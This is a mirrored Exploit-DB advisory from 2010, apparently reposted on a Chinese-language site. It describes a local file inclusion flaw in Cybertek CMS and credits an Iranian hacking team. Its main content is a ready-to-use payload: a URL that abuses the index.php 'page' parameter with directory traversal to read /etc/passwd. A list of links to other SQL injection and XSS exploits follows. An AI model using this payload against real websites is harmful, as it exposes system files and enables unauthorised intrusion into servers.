Cybertek CMS – Local File Inclusion

Exploit Database
13 阅读

作者： XroGuE

日期： 2010-05-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12619/

=======================================================
Cybertek CMS Local File Include Vulnerability
=======================================================
########################################
# Name: Cybertek CMS Local File Include Vulnerability
# Vendor: www.cybertek.co.za
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Vulnerability:

[+] Exploit: www.Site.com/[path]/index.php?page=[LFI]

[+] Demo: http://server/index.php?page=../../../../../../../../../../../etc/passwd


[+] Done ... ! :))

########################################

last Exploits
Cybertek CMS – Local File Inclusion的更多信息

AlamFifa CMS – ‘user_name_cookie’ SQL Injection：
Art Gallery Management System Project v1.0 – SQL Injection (cid) Unauthenticated：
ZAPms 1.22 – ‘nick’ SQL Injection：
WordPress Plugin Symposium 14.10 – SQL Injection：
Categorizator 0.3.1 – SQL Injection：
LifeRay 7.2.1 GA2 – Stored XSS：
Etano 1.20/1.22 – ‘search.php’ Multiple Cross-Site Scripting Vulnerabilities：
HP Insight Diagnostics Online Edition 8.4 – ‘globals.php?tabpage’ Cross-Site Scripting：